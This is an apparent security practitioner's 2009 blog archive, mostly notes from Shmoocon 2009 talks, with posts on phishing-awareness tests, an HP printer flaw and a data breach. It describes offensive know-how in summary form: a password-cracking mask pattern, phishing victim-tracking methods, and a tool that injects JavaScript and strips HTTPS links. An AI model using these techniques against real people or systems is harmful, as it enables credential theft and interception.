Archive for February 2009

Next Entries »

Social Skills and the Security Professional

February 9, 2009, 4:49 pm

Just how important is it for the Security Professional to have social skills?
It seems like a broken record. In addition to having degrees, certifications and experience. We are now supposed to glide seamlessly into the board room and converse equally well about business units and legal briefs. Its not enough to be technically competent, you’ve got to have a good golf game.
At Shmoocon in the closing plenary an audience member asked for a talk next year on preparing a 30 second security elevator talk. If you’re not familiar with the concept, it is that you have a brief elevator ride with an exec. You have their ear. How do you sell security before the door closes. My VP always asks “are we secure” when I see him. I’ve been told by my Infosec brethren that the answer is yes. Personally I think the answer is “HELL NO as long as users have local admin rights”. Or perhaps a joke, “you aren’t in handcuffs yet, so we must be doing something right.”.
Bill Brenner of CSO online obtained a good quote from the Hoff, Chris Hoff of Unisys and the Rational Security blog.

“The notion that everyone involved in security needs to be able to put themselves out there, get up and give a presentation to the board of directors is ridiculous. We still need skilled operators in the trenches, continuing to do what they do in the basement. Do I want to discourage someone who is fantastic at pen testing by telling them their career will be limited if they can’t put together a PowerPoint presentation for the board?

Tags: ,
Category: General  |  2 Comments

Shmoocon 2009 Day 3

February 8, 2009, 10:25 pm

Enough with the Insanity: Dictionary Base Rainbow Tables
by Matt Weir
http://reusablesec.googlepages.com/
Defense against offline password cracking
1. salt
2. Make it computationally expensive, 100 X SHA1.
Unless of course you salt it wrong.
WPA and WPA2 keys are salted with the SSID. NTLM uses the username as a salt.
The Problems with Rainbow Tables

  • Probabilistic in nature
  • Long creation time
  • Two hashes take twice as long to crack as one
  • Collisions result in a lot of wasted work

Traditional Rainbow Tables have been brute force attacks. However as Lanman hashes are increasingly disabled, and some organizations have implemented long password requirements (14 characters and up) we need to look at other methods. I’ve found NTLM Rainbow Tables to be massive. In my experience, any organization that has a strong password requirement can’t use NTLM Rainbow Tables. Last time I looked there wasn’t a Rainbow Table with length up to 8 and UPPERS, lowers and numbers. It would be too big.
So what do you do? Over at freerainbowtables.com you can download hybrid rainbow tables. From what I see its only really short passwords. I though Matt said they had a version of rcrack to generate your own hybrid rainbow table. That would be pretty cool.
I currently do this through bruteforce looking for the following.
Aaaa11122 where
A = UPPERS. So in this case the first letter is a upper case letter.
a = lower. In this case characters 2, 3 and 4 are lower case letters.
1 = lowers or numbers. So positions 5, 6 and 7 are lowers or numbers.
2 = lowers, numbers or ! So positions 8 or 9 have that.
I suspect a rainbow table looking at length 8 or 9 with that combination would save me time in the long run.
Matt has developed a dictionary based rainbow tables generator available at the URL at the top of this entry. It can take a dictionary and use common word wrangling rules to create rainbow tables. You can also check for common keyboard combos and double passwords. People often double their current password to meet lengthy password requirements.
I currently use Inside Pro’s Extreme GPU Bruteforcer. (Its much cheaper than Elcomsoft.) The software is cheap and a NVidea GeForce 8800 GT is relatively cheap as well. While watching this talk I was wondering about GPU bruteforcing versus Rainbow Tables. If I can do a hybrid Rainbow Table, is it then possible to write software to do a hybrid attack using the GPU. Or does the way a GPU work make that a bad idea?
JSunpack
By Blake Hartstein
JS Unpack is a javascript unpacker available online at jsunpack.jeet.org
It may be available as a download to run locally at some point.
The Problem:
There is a large volume of malicious javascript files. These encoded/encrypted javascript exploits are difficult to analyze.
In the past you would need to manually attempt to decode it by downloading it, attempting to modify it to be ‘safe’ and then run it. This is kind of dangerous and requires a sacrificial lamb.
To defeat manual analysis the malware creater would use escape sequences, encryption based on tags (so if you change a tag, it wont decrypt), Environmental variables as an encryption key, version detection, timing, and blacklisting. Additionally exploit kits can set their website to only service the malware once to an IP.
After manual methods, more automated efforts have occurred such as JSDecode by Dave Zimmer, the Ultimate deObfuscator by Stephen Chenette of Websense and Malzilla.
JS Unpack has the following goals

  • Safety – not requiring a sacrificial lamb
  • Archive content
  • Simulate the Browser and plugins (pdf and flash)
  • Combine the best hooking techniques
  • Enable analysis despite IP blocking
  • Integrate with IDS, crawling and other research

ClamAV is used to statically unpack executables
Plenary Session: Tough Security for Tough Times
This is mostly random notes from the session:
Security spending is holding steady due to compliance requirements and increasing threats.
The half life of security knowledge is 18 months.
This came back in a discussion of security degrees. Engineering constants don’t change. But very quickly the degree you received could be seen as useful as a diploma form the punch card era.
DLP is seen as taking off by one analyst. (I guess when everything is DLP, it must get a lot of sales)
Management needs to understand that security isn’t overhead.
The bad guys have learned to stay below the radar. Business will ignore it as long as a threshold isn’t exceeded.
How do you grow security talent that can relate to business.

Tags: , ,
Category: General  |  Comment

Shmoocon 2009 Day 2

February 8, 2009, 9:01 pm

I really shouldn’t have to wake up at 7:30 am on a Saturday and take the Metro into DC. Fortunately I thought the 10am talk was worth it.
Phishing Statistics and Intuitive Enumeration of Hosts and Roles
by Sean Palka
This talk is about a tool he created/uses in corporate engagements. But as with most things developed on company time, its not free to be released. The presentation is to give you ideas. And it does make me realize that could be a fun side project if I can’t get money for Phishme and I cant get ahold of Lunker.
The motivation for this tool is to justify to clients that phishing is a useful exercise. He also wanted the tool to gather reliable stats for reporting.
When phishing a company you may find that distribution lists are hit. You may find email forwarded from one user to another. Just as with a marketing campaign, webbugs, images and unique identifiers in URLs are used to determine who is following a link. Most mail clients no longer load images by default, so that cuts down somewhat on the capability to determine a message was read but the link was not clicked on. However, some companies may whitelist their own domain name allowing images to load automatically.
A bad guy phishing doesn’t care who responds. He just wants the credentials. But whitehat phsihing needs reports and attribution. You want to know who just visited the site without providing the phished for information. Your phishing site could have contained a browser exploit just as easily.
Tagging or using unique identifiers in URLs does not solve the problem of message forwarding or when a single user has logged in at multiple locations. While time can be used to determine the person probably didn’t drive home, that person could have used remote desktop. You just dont know if the message was forwarded or if the user is going from computer to computer trying the URL.
An audience member pointed out that you could use images and the client cache to determine if the same computer visits more than once. (I’m not sure how that would work if a proxy is used).
You may be able to determine “important” systems by the responses as well. If one computer has a higher than normal amount of responses it might be a helpdesk or admin checking our user reports. Obviously if NAT is involved, you need to do your phishing from internal.
Additionally you can determine social networks by seeing to whom the email is forwarded.
When a internal system is used for a phishing attack the following are pros/cons
- The firewall prevents external connections. Email may be forwarded externally and responses cannot get to your internal site.
- People may trust the internal IP and act differently.
- You don’t have to worry about your other security filtering getting in the way. This isn’t a test of your spam filter.
- you can build focused attack on victims.
Whitehat phishing attacks where the website is external have little ability to get the client IP. He said he hasn’t had a lot consistent success using PHP. This limits reporting capabilities when NAT is used.
I didn’t ask if he did customization to use the users names in the target emails.
He doesn’t include training in the tools (as Phishme does) because the focus of his tool is pentesting not security training. While this is understandable given his role at BAH, I think most people looking to do whitehat phishing are going to want to provide the immediate user feedback/training that has been proven to be effective.
Stranger in a Strange Land: Reflections on a Linux guy’s First Year at Microsoft
by Crispan Cowan
A lot of the talk, I felt I’d seen in either the SDL blog or from Jeff Jones’ blog. Basically slides pointing out the success of the Security Development Lifecycle at Microsoft. Security at Microsoft comes down to before the 2002 Bill Gates Memo and after. For those who don’t know, Microsoft shut down coding for a month and re-trained employees in secure coding practices. They then followed up and made sure people did it.
One of the big problems that isn’t going away is legacy. There are a lot of applications that rely on doing dangerous stupid things that they have been allowed to do. There is so much breakage you can do before people start to push back. (side comment, it was a huge deal for Microsoft to disable IIS by default in a desktop operating system. Their application vendors expected it to be there). It is hard to fix architecture issues without screwing old applications. The application base is the value in Windows.
One of the big problems is the massive dependence on local admin. UAC is the stick used to cause programs to write their application so it doesn’t require local admin rights. Its not UAC that sucks, its the crappy application that needs admin rights just to run.
88% of users participating in the feedback program leave UAC enabled.
Another metric they use is sessions that are UAC prompt free.
In Vista RTM, this was 50%.
With SP1, consumer desktops were at 65% and computers joined to a domain (work computers) was at 80%.
I assume this means the applications are getting improved to not need admin rights. It could mean people stopped using the crappy app.
Middling Everything with Middler
by Jay Beale
Obviously MITM is nothing new. What this project does is

  1. Inject javascript into HTTP
  2. Store session ID
  3. Intercept logout requests (even if you think you’ve logged out you haven’t
  4. Replace https links with http links (your http bank site which only uses https for login is now logging in in clear text)

The purpose of the tool is:

  • Inject javascript into every page
  • inject temp or permanent redirects
  • Take over website with Browser exploitation framework
  • Compromise user with metasploit

Middler is available on the InGuardians website.
The Agreement
A group of friends set up a framework of rules to govern as they attempt to 0wn each others computers. When no one else will set up a capture the flag exercise for you, you hack on each other.
http://www.jointheagreement.com/
The Fast-Track Suite
by David Kennedy
The Fast Track suite will be available in Backtrack 4. Or check out the Fast Track website..
All I seem to remember is “pop a box.” ;)
Very interesting point and click hacking. As I understand it, some Metasploit attacks were only available for old specific service packs, he has made the attacks more universal.
In Pen Testing, I believe people use Windows debug to convert the uploaded hex into binary. There is a built in 64 kb limit. He automates a way to get around that by supplying a new debug util (at least that is how I understood it).
In the demos he’d run an exploit upload vnc server and connect to it.
I didn’t get a chair during this talk so I dont have a lot of notes.

Tags: , , , ,
Category: General  |  Comment

Shmoocon 2009 Day 1

February 8, 2009, 7:41 pm

The next three posts will contain my notes from Shmoocon. This post contains notes from each session I attended on day 1. I’m not trying to necessarily reconstruct the notes into a coherent thought. Hopefully it will be somewhat readable.
Opening Remarks
by Bruce Potter
People are getting owned a lot.
Trends

  • Increased success in getting past our defenses
  • Increasingly malicious motivations. The bad guys aren’t after web defacements
  • In spite of the above, we haven’t changed our methods. Its a lot of the same
  • Spear phishing and drive-bys are unabated.

What we have is a Maginot line…in depth
Of 66 million websites indexed by Google, 5 percent had drivebys.
These sites with drivebys weren’t just the risky underbelly of the web. It was every category of website. I don’t think that is surprising to anyone who has paid attention to security.
These findings were published last year in in USENIX.
The malicious content on these sites was then scanned using three top Antivirus vendors. The best detection rate among these three vendors was only 75%. The worst was 30%. These are untargeted attacks. Imagine the ability of an attack targeted at your organization to cut through your antivirus defenses.
So What do you do?
NAC? Most people don’t have that deployed even if they’ve bought it.
Firewall Internally?
Token authentication?
Change jobs?
Digging ourselves out
As with most security talks and papers I felt like a solution wasn’t really there. Fixing fundamental problems. I’m not sure if Bruce defined this. If he means teach everyone to code securely, then burn to the ground existing software and start over. Well, keep waiting for that.

The other talks on day one were quick 25 minute talks, I didn’t always have notes.
Open Vulture – Scavenging the Friendly Skies
Open Source UAV Platform
Ethan O’Toole and Matt David
I didn’t take a lot of notes on this one. The talk was put together fine. It pointed out the existing/competing projects and how they were different.
Building the 2008/2009 ShmooBall Launchers
by Larry Pesce and David Lauer
When building a pressure based launcher, you’ll have problems with PVC tubing not being rated for the PSI.
The Day Spam Stopped (The Srizbi Botnet Takedown)
by Julia Wolf
We all know about McColo being taken offline in November and the corresponding drop in spam rates.
The bad guys lost their command and control of the botnet when McColo was taken down. The good guys figured out how the botnet was selecting the hostname/domain name used in the backup. (The exact math of that is probably available at blog.fireeye.com or look for the slides when available on the Shmoocon website). By registering those domain names they prevented the bad guys from regaining control.
Under U.S. law they felt they could not send out a “uninstall” command to the botnet army. It would also be risky since the botnet is in kernel and you could potentially BSOD the clients.
No one asked about the return of spam that has been reported in January. Is that other botnets taking up the slack? I thought I had heard that a Spanish ISP had brought the badguys ASN back online briefly allowing them to regain control.
Automated Mapping of Large Binary Objects
by Greg Conti, Ben Sangster, and Roy Ragsdale.
The goal of this project is to accurately identify regions in an arbitrary binary object.
Typically you would use a hex editor and a lot of elbow grease. This is trying to automate that, even to the point of identifying one type of encryption versus another.
I found the talk interesting. When you’re doing manual static analysis of files, this could come in handy.
Decoding the Smartkey
by Shane Lawson
Quickset Smartkey attempts to allow the consumer to rekey their lock without removing it from the door. It is also resistant to bumpkeying. Here is a video from Quickset on how to rekey.
Unfortunately, as this talk demonstrates, because of the technology used to allow rekeying it is possible to determine key height compromising the lock.

Tags: , , , , , ,
Category: Antivirus, General  |  Comment

SANS Newsbites on Phishing your Company

February 7, 2009, 11:22 pm

SANS Newsbites is a summary of the most important news articles published on computer security in the past week. It includes commentary from an editorial board.
In Volume 11 Number 9, they reported on the DOJ self-phishing exercises that has been in the news. I was a little surprised that Marcus Ranum wrote “This sort of test generally serves only to embarrass people and hasn’t been shown to have any useful long-term effect. When I see someone trying this kind of stuff, I think it’s just a case of some auditor or pen-tester trying to prove their worth by having something about which they can scream “GOTCHA!”"
It is true that phishing does have a great chance of success for pentesters. But I’ve seen numbers from phishme.com showing a marked improvement from initial tests to followup tests. That is what Alan Paller said in reply to Ranum in the Newsbites as well.
I agree with what Paller wrote, Phishing your own company is a core component of increasing security awareness
Any such testing should have the appropriate approval of course. The contents of the phish should be considered carefully. You don’t want users to think you’ve gathered their credit card information and you dont want them notifying external fraud alert services. There is plenty of education opportunities without attempting to harvest Paypal accounts for example.

Tags: ,
Category: Awareness  |  Comment

Shmoocon 2009

February 6, 2009, 10:06 pm

I’m at Shmoocon 5 this weekend. Its my third time down there (missed 1 and 3). Always a good time.
This year’s event has 1500 attendees, 40% larger than last year. 30ish talks chosen from 100 submitted.
The opening remarks kind of paralleled what I’ve been thinking lately. The stakes are high. Yet any sort of targeted attack has a great chance of succeeding. Many of our defenses are the same layer repeated. “We’ve built a Maginot line…in depth.”

Tags:
Category: Uncategorized  |  Comment

HP Printer HTTP Authentication Bypass

February 6, 2009, 9:56 pm

HP is reporting that “a potential security vulnerability has been identified with certain HP LaserJet printers, HP Color LaserJet printers and HP Digital Senders. The vulnerability could be exploited remotely to gain unauthorized access to files.”
CVE-2008-4419 adds that this is a directory traversal vulnerability.
In a post to Bugtraq, Digital Defense says an attacker can read arbitrary system configuration files, and cached documents.
HP Web Jetadmin should make quick work for printer admins needing to perform updates.

Category: General  |  Comment

SRA Reports Possible Data Breach

February 4, 2009, 8:01 pm

SRA warned employees, ex-employees and customers of a possible data breach.
In an letter ot the Maryland Attorney General’s office, SRA reported that a virus on their network may have led to data disclosure.

Category: General  |  3 Comments
Next Entries »